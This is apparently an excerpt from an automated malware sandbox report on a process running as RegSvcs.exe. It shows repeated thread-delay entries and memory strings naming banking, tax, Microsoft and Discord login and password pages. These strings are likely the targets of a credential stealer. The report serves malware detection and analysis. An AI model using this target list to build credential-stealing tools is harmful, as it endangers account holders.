Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595843 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595734 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595625 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595515 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595406 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595296 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595187 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595078 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594968 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594859 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594750 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594640 |
Jump to behavior |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696501413o |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~ |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696501413j |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3709427363.0000000001100000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM^ |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - COM.HKVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696501413t |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - HKVMware20,11696501413] |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - COM.HKVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - HKVMware20,11696501413] |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696501413j |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696501413x |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactiveuserers.comVMware20,11696501413} |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696501413} |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696501413t |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactiveuserers.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696501413s |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696501413f |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactiveuserers.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^ |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696501413x |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696501413x |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696501413} |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactiveuserers.co.inVMware20,11696501413d |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696501413x |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696501413s |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696501413t |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696501413t |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - EU WestVMware20,11696501413n |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696501413u |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactiveuserers.comVMware20,11696501413} |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - EU WestVMware20,11696501413n |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696501413u |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~ |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactiveuserers.co.inVMware20,11696501413d |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696501413 |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^ |
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696501413o |
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696501413f |